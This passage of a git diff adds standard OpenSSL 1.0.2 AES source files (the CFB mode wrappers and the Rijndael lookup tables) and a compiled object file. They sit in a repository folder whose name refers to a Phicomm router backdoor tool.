+    CRYPTO_cfb128_1_encrypt(in, out, length, key, ivec, num, enc,
+                            (block128_f) AES_encrypt);
+}
+
+void AES_cfb8_encrypt(const unsigned char *in, unsigned char *out,
+                      size_t length, const AES_KEY *key,
+                      unsigned char *ivec, int *num, const int enc)
+{
+    CRYPTO_cfb128_8_encrypt(in, out, length, key, ivec, num, enc,
+                            (block128_f) AES_encrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cfb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cfb.o
new file mode 100644
index 0000000000000000000000000000000000000000..77172cdc5bfdc246a3cdd4b1ecbf8bf3ad9a8241
GIT binary patch
literal 2080
zcmbtUO=}ZT6uoJxty*Ig7r{yyL8PJ`l3G!#NZL9{mC%+p6$NFS#AypQX_!o)bzv7S
z1?jRs!N1_Hpg*Kbmx?<P;yp9(CX<)RrXG0j-goY~@6G$Tvu~9OLx}_l67-n5BVmb-
zhr510aPxGY#_0Eji9ajtyI?*&xt>}10dMi+_sqAGM5ws1Fl$V%S6X$yWjrwNnAxe^
zy;d;HeVERg*_oRmjb#9QR+`%>ZpEc_8X`IZm*fUq4h<#VuTo++ofsb*89m?)US%E)
zxPs0~r3<Nyl`@{DMtO+XBk+tt@mFCuHm*W_24_1=zuJ8PCX%ry4_<cDo0SZ9-^*c?
zq|^Omz>f^zvEzOugH!G0&++h5<U512VQzvO?m@>46LEZg0RNnM%rEnb-5j9bS9+`i
zi2i{6xOK^Kn|5`hVpeI+T7#FHzHhtrs<+qh$u5?b=jTfHa-pzhmF@D}e95u{p(qws
zU#^sw^*ouXGf}TB*Ws10yJD}f%garj;eFuD|F%P1WFNpAALAzcHINKle=DQ|eTse2
zKUBP~w<3C+pXd$6bA6%4I>;+ecsc(!8ZY-lW^=FRI~BIR7uqfHJa^kMeRtO<^R44M
zWLBC@GOIhanp<bCzT>+l*Z5S^cdGByc(dLz8{SUC_53|DgBjc{d&6^TuKI%iGX|%l
zX7!57GY2e%rqe?k#W)XeSNSN({-G*qyi?#TH{?nsW<WA-a09RZ0X`!b1AYD5tihZo
z&ChWz=FD=7Le`h}B{5lF>?{Yw7Y*#!=pf?j+GiX?EkxfO<VWZjM$mUVIX_`4>|jnk
z|5yojl@+7szve*P{Y`>oEQThyKjccj++W<<NO_?)dZ;XF9JQ$DgVXPhDf+24^aX<m
V)N~yN|BJZ%hWh^Pjxu!g{C~St(~kfE

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_core.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_core.c
new file mode 100644
index 0000000..ff0d164
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_core.c
@@ -0,0 +1,1363 @@
+/* crypto/aes/aes_core.c -*- mode:C; c-file-style: "eay" -*- */
+/**
+ * rijndael-alg-fst.c
+ *
+ * @version 3.0 (December 2000)
+ *
+ * Optimised ANSI C code for the Rijndael cipher (now AES)
+ *
+ * @author Vincent Rijmen <vincent.rijmen@esat.kuleuven.ac.be>
+ * @author Antoon Bosselaers <antoon.bosselaers@esat.kuleuven.ac.be>
+ * @author Paulo Barreto <paulo.barreto@terra.com.br>
+ *
+ * This code is hereby placed in the public domain.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS
+ * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+ * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
+ * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+ * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
+ * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
+ * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+/* Note: rewritten a little bit to provide error control and an OpenSSL-
+   compatible API */
+
+#ifndef AES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+#include <stdlib.h>
+#include <openssl/aes.h>
+#include "aes_locl.h"
+
+#ifndef AES_ASM
+/*-
+Te0[x] = S [x].[02, 01, 01, 03];
+Te1[x] = S [x].[03, 02, 01, 01];
+Te2[x] = S [x].[01, 03, 02, 01];
+Te3[x] = S [x].[01, 01, 03, 02];
+
+Td0[x] = Si[x].[0e, 09, 0d, 0b];
+Td1[x] = Si[x].[0b, 0e, 09, 0d];
+Td2[x] = Si[x].[0d, 0b, 0e, 09];
+Td3[x] = Si[x].[09, 0d, 0b, 0e];
+Td4[x] = Si[x].[01];
+*/
+
+static const u32 Te0[256] = {
+    0xc66363a5U, 0xf87c7c84U, 0xee777799U, 0xf67b7b8dU,
+    0xfff2f20dU, 0xd66b6bbdU, 0xde6f6fb1U, 0x91c5c554U,
+    0x60303050U, 0x02010103U, 0xce6767a9U, 0x562b2b7dU,
+    0xe7fefe19U, 0xb5d7d762U, 0x4dababe6U, 0xec76769aU,
+    0x8fcaca45U, 0x1f82829dU, 0x89c9c940U, 0xfa7d7d87U,
+    0xeffafa15U, 0xb25959ebU, 0x8e4747c9U, 0xfbf0f00bU,
+    0x41adadecU, 0xb3d4d467U, 0x5fa2a2fdU, 0x45afafeaU,
+    0x239c9cbfU, 0x53a4a4f7U, 0xe4727296U, 0x9bc0c05bU,
+    0x75b7b7c2U, 0xe1fdfd1cU, 0x3d9393aeU, 0x4c26266aU,
+    0x6c36365aU, 0x7e3f3f41U, 0xf5f7f702U, 0x83cccc4fU,
+    0x6834345cU, 0x51a5a5f4U, 0xd1e5e534U, 0xf9f1f108U,
+    0xe2717193U, 0xabd8d873U, 0x62313153U, 0x2a15153fU,
+    0x0804040cU, 0x95c7c752U, 0x46232365U, 0x9dc3c35eU,
+    0x30181828U, 0x379696a1U, 0x0a05050fU, 0x2f9a9ab5U,
+    0x0e070709U, 0x24121236U, 0x1b80809bU, 0xdfe2e23dU,
+    0xcdebeb26U, 0x4e272769U, 0x7fb2b2cdU, 0xea75759fU,
+    0x1209091bU, 0x1d83839eU, 0x582c2c74U, 0x341a1a2eU,
+    0x361b1b2dU, 0xdc6e6eb2U, 0xb45a5aeeU, 0x5ba0a0fbU,
+    0xa45252f6U, 0x763b3b4dU, 0xb7d6d661U, 0x7db3b3ceU,
+    0x5229297bU, 0xdde3e33eU, 0x5e2f2f71U, 0x13848497U,
+    0xa65353f5U, 0xb9d1d168U, 0x00000000U, 0xc1eded2cU,
+    0x40202060U, 0xe3fcfc1fU, 0x79b1b1c8U, 0xb65b5bedU,
+    0xd46a6abeU, 0x8dcbcb46U, 0x67bebed9U, 0x7239394bU,
+    0x944a4adeU, 0x984c4cd4U, 0xb05858e8U, 0x85cfcf4aU,
+    0xbbd0d06bU, 0xc5efef2aU, 0x4faaaae5U, 0xedfbfb16U,
+    0x864343c5U, 0x9a4d4dd7U, 0x66333355U, 0x11858594U,
+    0x8a4545cfU, 0xe9f9f910U, 0x04020206U, 0xfe7f7f81U,
+    0xa05050f0U, 0x783c3c44U, 0x259f9fbaU, 0x4ba8a8e3U,
+    0xa25151f3U, 0x5da3a3feU, 0x804040c0U, 0x058f8f8aU,
+    0x3f9292adU, 0x219d9dbcU, 0x70383848U, 0xf1f5f504U,
+    0x63bcbcdfU, 0x77b6b6c1U, 0xafdada75U, 0x42212163U,
+    0x20101030U, 0xe5ffff1aU, 0xfdf3f30eU, 0xbfd2d26dU,
+    0x81cdcd4cU, 0x180c0c14U, 0x26131335U, 0xc3ecec2fU,
+    0xbe5f5fe1U, 0x359797a2U, 0x884444ccU, 0x2e171739U,
+    0x93c4c457U, 0x55a7a7f2U, 0xfc7e7e82U, 0x7a3d3d47U,
+    0xc86464acU, 0xba5d5de7U, 0x3219192bU, 0xe6737395U,
+    0xc06060a0U, 0x19818198U, 0x9e4f4fd1U, 0xa3dcdc7fU,
+    0x44222266U, 0x542a2a7eU, 0x3b9090abU, 0x0b888883U,
+    0x8c4646caU, 0xc7eeee29U, 0x6bb8b8d3U, 0x2814143cU,
+    0xa7dede79U, 0xbc5e5ee2U, 0x160b0b1dU, 0xaddbdb76U,
+    0xdbe0e03bU, 0x64323256U, 0x743a3a4eU, 0x140a0a1eU,
+    0x924949dbU, 0x0c06060aU, 0x4824246cU, 0xb85c5ce4U,
+    0x9fc2c25dU, 0xbdd3d36eU, 0x43acacefU, 0xc46262a6U,
+    0x399191a8U, 0x319595a4U, 0xd3e4e437U, 0xf279798bU,
+    0xd5e7e732U, 0x8bc8c843U, 0x6e373759U, 0xda6d6db7U,
+    0x018d8d8cU, 0xb1d5d564U, 0x9c4e4ed2U, 0x49a9a9e0U,
+    0xd86c6cb4U, 0xac5656faU, 0xf3f4f407U, 0xcfeaea25U,
+    0xca6565afU, 0xf47a7a8eU, 0x47aeaee9U, 0x10080818U,
+    0x6fbabad5U, 0xf0787888U, 0x4a25256fU, 0x5c2e2e72U,
+    0x381c1c24U, 0x57a6a6f1U, 0x73b4b4c7U, 0x97c6c651U,
+    0xcbe8e823U, 0xa1dddd7cU, 0xe874749cU, 0x3e1f1f21U,
+    0x964b4bddU, 0x61bdbddcU, 0x0d8b8b86U, 0x0f8a8a85U,
+    0xe0707090U, 0x7c3e3e42U, 0x71b5b5c4U, 0xcc6666aaU,
+    0x904848d8U, 0x06030305U, 0xf7f6f601U, 0x1c0e0e12U,
+    0xc26161a3U, 0x6a35355fU, 0xae5757f9U, 0x69b9b9d0U,
+    0x17868691U, 0x99c1c158U, 0x3a1d1d27U, 0x279e9eb9U,
+    0xd9e1e138U, 0xebf8f813U, 0x2b9898b3U, 0x22111133U,
+    0xd26969bbU, 0xa9d9d970U, 0x078e8e89U, 0x339494a7U,
+    0x2d9b9bb6U, 0x3c1e1e22U, 0x15878792U, 0xc9e9e920U,
+    0x87cece49U, 0xaa5555ffU, 0x50282878U, 0xa5dfdf7aU,
+    0x038c8c8fU, 0x59a1a1f8U, 0x09898980U, 0x1a0d0d17U,
+    0x65bfbfdaU, 0xd7e6e631U, 0x844242c6U, 0xd06868b8U,
+    0x824141c3U, 0x299999b0U, 0x5a2d2d77U, 0x1e0f0f11U,
+    0x7bb0b0cbU, 0xa85454fcU, 0x6dbbbbd6U, 0x2c16163aU,
+};
+static const u32 Te1[256] = {
+    0xa5c66363U, 0x84f87c7cU, 0x99ee7777U, 0x8df67b7bU,
+    0x0dfff2f2U, 0xbdd66b6bU, 0xb1de6f6fU, 0x5491c5c5U,
+    0x50603030U, 0x03020101U, 0xa9ce6767U, 0x7d562b2bU,
+    0x19e7fefeU, 0x62b5d7d7U, 0xe64dababU, 0x9aec7676U,
+    0x458fcacaU, 0x9d1f8282U, 0x4089c9c9U, 0x87fa7d7dU,
+    0x15effafaU, 0xebb25959U, 0xc98e4747U, 0x0bfbf0f0U,
+    0xec41adadU, 0x67b3d4d4U, 0xfd5fa2a2U, 0xea45afafU,
+    0xbf239c9cU, 0xf753a4a4U, 0x96e47272U, 0x5b9bc0c0U,
+    0xc275b7b7U, 0x1ce1fdfdU, 0xae3d9393U, 0x6a4c2626U,
+    0x5a6c3636U, 0x417e3f3fU, 0x02f5f7f7U, 0x4f83ccccU,
+    0x5c683434U, 0xf451a5a5U, 0x34d1e5e5U, 0x08f9f1f1U,
+    0x93e27171U, 0x73abd8d8U, 0x53623131U, 0x3f2a1515U,
+    0x0c080404U, 0x5295c7c7U, 0x65462323U, 0x5e9dc3c3U,
+    0x28301818U, 0xa1379696U, 0x0f0a0505U, 0xb52f9a9aU,
+    0x090e0707U, 0x36241212U, 0x9b1b8080U, 0x3ddfe2e2U,
+    0x26cdebebU, 0x694e2727U, 0xcd7fb2b2U, 0x9fea7575U,
+    0x1b120909U, 0x9e1d8383U, 0x74582c2cU, 0x2e341a1aU,
+    0x2d361b1bU, 0xb2dc6e6eU, 0xeeb45a5aU, 0xfb5ba0a0U,
+    0xf6a45252U, 0x4d763b3bU, 0x61b7d6d6U, 0xce7db3b3U,
+    0x7b522929U, 0x3edde3e3U, 0x715e2f2fU, 0x97138484U,
+    0xf5a65353U, 0x68b9d1d1U, 0x00000000U, 0x2cc1ededU,
+    0x60402020U, 0x1fe3fcfcU, 0xc879b1b1U, 0xedb65b5bU,
+    0xbed46a6aU, 0x468dcbcbU, 0xd967bebeU, 0x4b723939U,
+    0xde944a4aU, 0xd4984c4cU, 0xe8b05858U, 0x4a85cfcfU,
+    0x6bbbd0d0U, 0x2ac5efefU, 0xe54faaaaU, 0x16edfbfbU,
+    0xc5864343U, 0xd79a4d4dU, 0x55663333U, 0x94118585U,
+    0xcf8a4545U, 0x10e9f9f9U, 0x06040202U, 0x81fe7f7fU,
+    0xf0a05050U, 0x44783c3cU, 0xba259f9fU, 0xe34ba8a8U,
+    0xf3a25151U, 0xfe5da3a3U, 0xc0804040U, 0x8a058f8fU,
+    0xad3f9292U, 0xbc219d9dU, 0x48703838U, 0x04f1f5f5U,
+    0xdf63bcbcU, 0xc177b6b6U, 0x75afdadaU, 0x63422121U,
+    0x30201010U, 0x1ae5ffffU, 0x0efdf3f3U, 0x6dbfd2d2U,
+    0x4c81cdcdU, 0x14180c0cU, 0x35261313U, 0x2fc3ececU,
+    0xe1be5f5fU, 0xa2359797U, 0xcc884444U, 0x392e1717U,
+    0x5793c4c4U, 0xf255a7a7U, 0x82fc7e7eU, 0x477a3d3dU,
+    0xacc86464U, 0xe7ba5d5dU, 0x2b321919U, 0x95e67373U,
+    0xa0c06060U, 0x98198181U, 0xd19e4f4fU, 0x7fa3dcdcU,
+    0x66442222U, 0x7e542a2aU, 0xab3b9090U, 0x830b8888U,
+    0xca8c4646U, 0x29c7eeeeU, 0xd36bb8b8U, 0x3c281414U,
+    0x79a7dedeU, 0xe2bc5e5eU, 0x1d160b0bU, 0x76addbdbU,
+    0x3bdbe0e0U, 0x56643232U, 0x4e743a3aU, 0x1e140a0aU,
+    0xdb924949U, 0x0a0c0606U, 0x6c482424U, 0xe4b85c5cU,
+    0x5d9fc2c2U, 0x6ebdd3d3U, 0xef43acacU, 0xa6c46262U,
+    0xa8399191U, 0xa4319595U, 0x37d3e4e4U, 0x8bf27979U,
+    0x32d5e7e7U, 0x438bc8c8U, 0x596e3737U, 0xb7da6d6dU,
+    0x8c018d8dU, 0x64b1d5d5U, 0xd29c4e4eU, 0xe049a9a9U,
+    0xb4d86c6cU, 0xfaac5656U, 0x07f3f4f4U, 0x25cfeaeaU,
+    0xafca6565U, 0x8ef47a7aU, 0xe947aeaeU, 0x18100808U,
+    0xd56fbabaU, 0x88f07878U, 0x6f4a2525U, 0x725c2e2eU,
+    0x24381c1cU, 0xf157a6a6U, 0xc773b4b4U, 0x5197c6c6U,
+    0x23cbe8e8U, 0x7ca1ddddU, 0x9ce87474U, 0x213e1f1fU,
+    0xdd964b4bU, 0xdc61bdbdU, 0x860d8b8bU, 0x850f8a8aU,
+    0x90e07070U, 0x427c3e3eU, 0xc471b5b5U, 0xaacc6666U,
+    0xd8904848U, 0x05060303U, 0x01f7f6f6U, 0x121c0e0eU,
+    0xa3c26161U, 0x5f6a3535U, 0xf9ae5757U, 0xd069b9b9U,
+    0x91178686U, 0x5899c1c1U, 0x273a1d1dU, 0xb9279e9eU,
+    0x38d9e1e1U, 0x13ebf8f8U, 0xb32b9898U, 0x33221111U,
+    0xbbd26969U, 0x70a9d9d9U, 0x89078e8eU, 0xa7339494U,
+    0xb62d9b9bU, 0x223c1e1eU, 0x92158787U, 0x20c9e9e9U,
+    0x4987ceceU, 0xffaa5555U, 0x78502828U, 0x7aa5dfdfU,
+    0x8f038c8cU, 0xf859a1a1U, 0x80098989U, 0x171a0d0dU,
+    0xda65bfbfU, 0x31d7e6e6U, 0xc6844242U, 0xb8d06868U,
+    0xc3824141U, 0xb0299999U, 0x775a2d2dU, 0x111e0f0fU,
+    0xcb7bb0b0U, 0xfca85454U, 0xd66dbbbbU, 0x3a2c1616U,
+};
+static const u32 Te2[256] = {
+    0x63a5c663U, 0x7c84f87cU, 0x7799ee77U, 0x7b8df67bU,
+    0xf20dfff2U, 0x6bbdd66bU, 0x6fb1de6fU, 0xc55491c5U,
+    0x30506030U, 0x01030201U, 0x67a9ce67U, 0x2b7d562bU,
+    0xfe19e7feU, 0xd762b5d7U, 0xabe64dabU, 0x769aec76U,
+    0xca458fcaU, 0x829d1f82U, 0xc94089c9U, 0x7d87fa7dU,
+    0xfa15effaU, 0x59ebb259U, 0x47c98e47U, 0xf00bfbf0U,
+    0xadec41adU, 0xd467b3d4U, 0xa2fd5fa2U, 0xafea45afU,
+    0x9cbf239cU, 0xa4f753a4U, 0x7296e472U, 0xc05b9bc0U,
+    0xb7c275b7U, 0xfd1ce1fdU, 0x93ae3d93U, 0x266a4c26U,
+    0x365a6c36U, 0x3f417e3fU, 0xf702f5f7U, 0xcc4f83ccU,
+    0x345c6834U, 0xa5f451a5U, 0xe534d1e5U, 0xf108f9f1U,
+    0x7193e271U, 0xd873abd8U, 0x31536231U, 0x153f2a15U,
+    0x040c0804U, 0xc75295c7U, 0x23654623U, 0xc35e9dc3U,
+    0x18283018U, 0x96a13796U, 0x050f0a05U, 0x9ab52f9aU,
+    0x07090e07U, 0x12362412U, 0x809b1b80U, 0xe23ddfe2U,
+    0xeb26cdebU, 0x27694e27U, 0xb2cd7fb2U, 0x759fea75U,
+    0x091b1209U, 0x839e1d83U, 0x2c74582cU, 0x1a2e341aU,
+    0x1b2d361bU, 0x6eb2dc6eU, 0x5aeeb45aU, 0xa0fb5ba0U,
+    0x52f6a452U, 0x3b4d763bU, 0xd661b7d6U, 0xb3ce7db3U,
+    0x297b5229U, 0xe33edde3U, 0x2f715e2fU, 0x84971384U,
+    0x53f5a653U, 0xd168b9d1U, 0x00000000U, 0xed2cc1edU,
+    0x20604020U, 0xfc1fe3fcU, 0xb1c879b1U, 0x5bedb65bU,
+    0x6abed46aU, 0xcb468dcbU, 0xbed967beU, 0x394b7239U,
+    0x4ade944aU, 0x4cd4984cU, 0x58e8b058U, 0xcf4a85cfU,
+    0xd06bbbd0U, 0xef2ac5efU, 0xaae54faaU, 0xfb16edfbU,
+    0x43c58643U, 0x4dd79a4dU, 0x33556633U, 0x85941185U,
+    0x45cf8a45U, 0xf910e9f9U, 0x02060402U, 0x7f81fe7fU,
+    0x50f0a050U, 0x3c44783cU, 0x9fba259fU, 0xa8e34ba8U,
+    0x51f3a251U, 0xa3fe5da3U, 0x40c08040U, 0x8f8a058fU,
+    0x92ad3f92U, 0x9dbc219dU, 0x38487038U, 0xf504f1f5U,
+    0xbcdf63bcU, 0xb6c177b6U, 0xda75afdaU, 0x21634221U,
+    0x10302010U, 0xff1ae5ffU, 0xf30efdf3U, 0xd26dbfd2U,
+    0xcd4c81cdU, 0x0c14180cU, 0x13352613U, 0xec2fc3ecU,
+    0x5fe1be5fU, 0x97a23597U, 0x44cc8844U, 0x17392e17U,
+    0xc45793c4U, 0xa7f255a7U, 0x7e82fc7eU, 0x3d477a3dU,
+    0x64acc864U, 0x5de7ba5dU, 0x192b3219U, 0x7395e673U,
+    0x60a0c060U, 0x81981981U, 0x4fd19e4fU, 0xdc7fa3dcU,
+    0x22664422U, 0x2a7e542aU, 0x90ab3b90U, 0x88830b88U,
+    0x46ca8c46U, 0xee29c7eeU, 0xb8d36bb8U, 0x143c2814U,
+    0xde79a7deU, 0x5ee2bc5eU, 0x0b1d160bU, 0xdb76addbU,
+    0xe03bdbe0U, 0x32566432U, 0x3a4e743aU, 0x0a1e140aU,
+    0x49db9249U, 0x060a0c06U, 0x246c4824U, 0x5ce4b85cU,
+    0xc25d9fc2U, 0xd36ebdd3U, 0xacef43acU, 0x62a6c462U,
+    0x91a83991U, 0x95a43195U, 0xe437d3e4U, 0x798bf279U,
+    0xe732d5e7U, 0xc8438bc8U, 0x37596e37U, 0x6db7da6dU,
+    0x8d8c018dU, 0xd564b1d5U, 0x4ed29c4eU, 0xa9e049a9U,
+    0x6cb4d86cU, 0x56faac56U, 0xf407f3f4U, 0xea25cfeaU,
+    0x65afca65U, 0x7a8ef47aU, 0xaee947aeU, 0x08181008U,
+    0xbad56fbaU, 0x7888f078U, 0x256f4a25U, 0x2e725c2eU,
+    0x1c24381cU, 0xa6f157a6U, 0xb4c773b4U, 0xc65197c6U,
+    0xe823cbe8U, 0xdd7ca1ddU, 0x749ce874U, 0x1f213e1fU,
+    0x4bdd964bU, 0xbddc61bdU, 0x8b860d8bU, 0x8a850f8aU,
+    0x7090e070U, 0x3e427c3eU, 0xb5c471b5U, 0x66aacc66U,
+    0x48d89048U, 0x03050603U, 0xf601f7f6U, 0x0e121c0eU,
+    0x61a3c261U, 0x355f6a35U, 0x57f9ae57U, 0xb9d069b9U,
+    0x86911786U, 0xc15899c1U, 0x1d273a1dU, 0x9eb9279eU,
+    0xe138d9e1U, 0xf813ebf8U, 0x98b32b98U, 0x11332211U,
+    0x69bbd269U, 0xd970a9d9U, 0x8e89078eU, 0x94a73394U,
+    0x9bb62d9bU, 0x1e223c1eU, 0x87921587U, 0xe920c9e9U,
+    0xce4987ceU, 0x55ffaa55U, 0x28785028U, 0xdf7aa5dfU,
+    0x8c8f038cU, 0xa1f859a1U, 0x89800989U, 0x0d171a0dU,
+    0xbfda65bfU, 0xe631d7e6U, 0x42c68442U, 0x68b8d068U,
+    0x41c38241U, 0x99b02999U, 0x2d775a2dU, 0x0f111e0fU,
+    0xb0cb7bb0U, 0x54fca854U, 0xbbd66dbbU, 0x163a2c16U,
+};
+static const u32 Te3[256] = {
+    0x6363a5c6U, 0x7c7c84f8U, 0x777799eeU, 0x7b7b8df6U,
+    0xf2f20dffU, 0x6b6bbdd6U, 0x6f6fb1deU, 0xc5c55491U,
+    0x30305060U, 0x01010302U, 0x6767a9ceU, 0x2b2b7d56U,
+    0xfefe19e7U, 0xd7d762b5U, 0xababe64dU, 0x76769aecU,
+    0xcaca458fU, 0x82829d1fU, 0xc9c94089U, 0x7d7d87faU,
+    0xfafa15efU, 0x5959ebb2U, 0x4747c98eU, 0xf0f00bfbU,
+    0xadadec41U, 0xd4d467b3U, 0xa2a2fd5fU, 0xafafea45U,
+    0x9c9cbf23U, 0xa4a4f753U, 0x727296e4U, 0xc0c05b9bU,
+    0xb7b7c275U, 0xfdfd1ce1U, 0x9393ae3dU, 0x26266a4cU,
+    0x36365a6cU, 0x3f3f417eU, 0xf7f702f5U, 0xcccc4f83U,
+    0x34345c68U, 0xa5a5f451U, 0xe5e534d1U, 0xf1f108f9U,
+    0x717193e2U, 0xd8d873abU, 0x31315362U, 0x15153f2aU,
+    0x04040c08U, 0xc7c75295U, 0x23236546U, 0xc3c35e9dU,
+    0x18182830U, 0x9696a137U, 0x05050f0aU, 0x9a9ab52fU,
+    0x0707090eU, 0x12123624U, 0x80809b1bU, 0xe2e23ddfU,
+    0xebeb26cdU, 0x2727694eU, 0xb2b2cd7fU, 0x75759feaU,
+    0x09091b12U, 0x83839e1dU, 0x2c2c7458U, 0x1a1a2e34U,
+    0x1b1b2d36U, 0x6e6eb2dcU, 0x5a5aeeb4U, 0xa0a0fb5bU,
+    0x5252f6a4U, 0x3b3b4d76U, 0xd6d661b7U, 0xb3b3ce7dU,
+    0x29297b52U, 0xe3e33eddU, 0x2f2f715eU, 0x84849713U,
+    0x5353f5a6U, 0xd1d168b9U, 0x00000000U, 0xeded2cc1U,
+    0x20206040U, 0xfcfc1fe3U, 0xb1b1c879U, 0x5b5bedb6U,
+    0x6a6abed4U, 0xcbcb468dU, 0xbebed967U, 0x39394b72U,
+    0x4a4ade94U, 0x4c4cd498U, 0x5858e8b0U, 0xcfcf4a85U,
+    0xd0d06bbbU, 0xefef2ac5U, 0xaaaae54fU, 0xfbfb16edU,
+    0x4343c586U, 0x4d4dd79aU, 0x33335566U, 0x85859411U,
+    0x4545cf8aU, 0xf9f910e9U, 0x02020604U, 0x7f7f81feU,
+    0x5050f0a0U, 0x3c3c4478U, 0x9f9fba25U, 0xa8a8e34bU,
+    0x5151f3a2U, 0xa3a3fe5dU, 0x4040c080U, 0x8f8f8a05U,
+    0x9292ad3fU, 0x9d9dbc21U, 0x38384870U, 0xf5f504f1U,
+    0xbcbcdf63U, 0xb6b6c177U, 0xdada75afU, 0x21216342U,
+    0x10103020U, 0xffff1ae5U, 0xf3f30efdU, 0xd2d26dbfU,
+    0xcdcd4c81U, 0x0c0c1418U, 0x13133526U, 0xecec2fc3U,
+    0x5f5fe1beU, 0x9797a235U, 0x4444cc88U, 0x1717392eU,
+    0xc4c45793U, 0xa7a7f255U, 0x7e7e82fcU, 0x3d3d477aU,
+    0x6464acc8U, 0x5d5de7baU, 0x19192b32U, 0x737395e6U,
+    0x6060a0c0U, 0x81819819U, 0x4f4fd19eU, 0xdcdc7fa3U,
+    0x22226644U, 0x2a2a7e54U, 0x9090ab3bU, 0x8888830bU,
+    0x4646ca8cU, 0xeeee29c7U, 0xb8b8d36bU, 0x14143c28U,
+    0xdede79a7U, 0x5e5ee2bcU, 0x0b0b1d16U, 0xdbdb76adU,
+    0xe0e03bdbU, 0x32325664U, 0x3a3a4e74U, 0x0a0a1e14U,
+    0x4949db92U, 0x06060a0cU, 0x24246c48U, 0x5c5ce4b8U,
+    0xc2c25d9fU, 0xd3d36ebdU, 0xacacef43U, 0x6262a6c4U,
+    0x9191a839U, 0x9595a431U, 0xe4e437d3U, 0x79798bf2U,
+    0xe7e732d5U, 0xc8c8438bU, 0x3737596eU, 0x6d6db7daU,
+    0x8d8d8c01U, 0xd5d564b1U, 0x4e4ed29cU, 0xa9a9e049U,
+    0x6c6cb4d8U, 0x5656faacU, 0xf4f407f3U, 0xeaea25cfU,
+    0x6565afcaU, 0x7a7a8ef4U, 0xaeaee947U, 0x08081810U,
+    0xbabad56fU, 0x787888f0U, 0x25256f4aU, 0x2e2e725cU,
+    0x1c1c2438U, 0xa6a6f157U, 0xb4b4c773U, 0xc6c65197U,
+    0xe8e823cbU, 0xdddd7ca1U, 0x74749ce8U, 0x1f1f213eU,
+    0x4b4bdd96U, 0xbdbddc61U, 0x8b8b860dU, 0x8a8a850fU,
+    0x707090e0U, 0x3e3e427cU, 0xb5b5c471U, 0x6666aaccU,
+    0x4848d890U, 0x03030506U, 0xf6f601f7U, 0x0e0e121cU,
+    0x6161a3c2U, 0x35355f6aU, 0x5757f9aeU, 0xb9b9d069U,
+    0x86869117U, 0xc1c15899U, 0x1d1d273aU, 0x9e9eb927U,
+    0xe1e138d9U, 0xf8f813ebU, 0x9898b32bU, 0x11113322U,
+    0x6969bbd2U, 0xd9d970a9U, 0x8e8e8907U, 0x9494a733U,
+    0x9b9bb62dU, 0x1e1e223cU, 0x87879215U, 0xe9e920c9U,
+    0xcece4987U, 0x5555ffaaU, 0x28287850U, 0xdfdf7aa5U,
+    0x8c8c8f03U, 0xa1a1f859U, 0x89898009U, 0x0d0d171aU,
+    0xbfbfda65U, 0xe6e631d7U, 0x4242c684U, 0x6868b8d0U,
+    0x4141c382U, 0x9999b029U, 0x2d2d775aU, 0x0f0f111eU,
+    0xb0b0cb7bU, 0x5454fca8U, 0xbbbbd66dU, 0x16163a2cU,
+};
+
+static const u32 Td0[256] = {
+    0x51f4a750U, 0x7e416553U, 0x1a17a4c3U, 0x3a275e96U,
+    0x3bab6bcbU, 0x1f9d45f1U, 0xacfa58abU, 0x4be30393U,
+    0x2030fa55U, 0xad766df6U, 0x88cc7691U, 0xf5024c25U,
+    0x4fe5d7fcU, 0xc52acbd7U, 0x26354480U, 0xb562a38fU,
+    0xdeb15a49U, 0x25ba1b67U, 0x45ea0e98U, 0x5dfec0e1U,
+    0xc32f7502U, 0x814cf012U, 0x8d4697a3U, 0x6bd3f9c6U,
+    0x038f5fe7U, 0x15929c95U, 0xbf6d7aebU, 0x955259daU,
+    0xd4be832dU, 0x587421d3U, 0x49e06929U, 0x8ec9c844U,
+    0x75c2896aU, 0xf48e7978U, 0x99583e6bU, 0x27b971ddU,
+    0xbee14fb6U, 0xf088ad17U, 0xc920ac66U, 0x7dce3ab4U,
+    0x63df4a18U, 0xe51a3182U, 0x97513360U, 0x62537f45U,
+    0xb16477e0U, 0xbb6bae84U, 0xfe81a01cU, 0xf9082b94U,
+    0x70486858U, 0x8f45fd19U, 0x94de6c87U, 0x527bf8b7U,
+    0xab73d323U, 0x724b02e2U, 0xe31f8f57U, 0x6655ab2aU,
+    0xb2eb2807U, 0x2fb5c203U, 0x86c57b9aU, 0xd33708a5U,
+    0x302887f2U, 0x23bfa5b2U, 0x02036abaU, 0xed16825cU,
+    0x8acf1c2bU, 0xa779b492U, 0xf307f2f0U, 0x4e69e2a1U,
+    0x65daf4cdU, 0x0605bed5U, 0xd134621fU, 0xc4a6fe8aU,
+    0x342e539dU, 0xa2f355a0U, 0x058ae132U, 0xa4f6eb75U,
+    0x0b83ec39U, 0x4060efaaU, 0x5e719f06U, 0xbd6e1051U,
+    0x3e218af9U, 0x96dd063dU, 0xdd3e05aeU, 0x4de6bd46U,
+    0x91548db5U, 0x71c45d05U, 0x0406d46fU, 0x605015ffU,
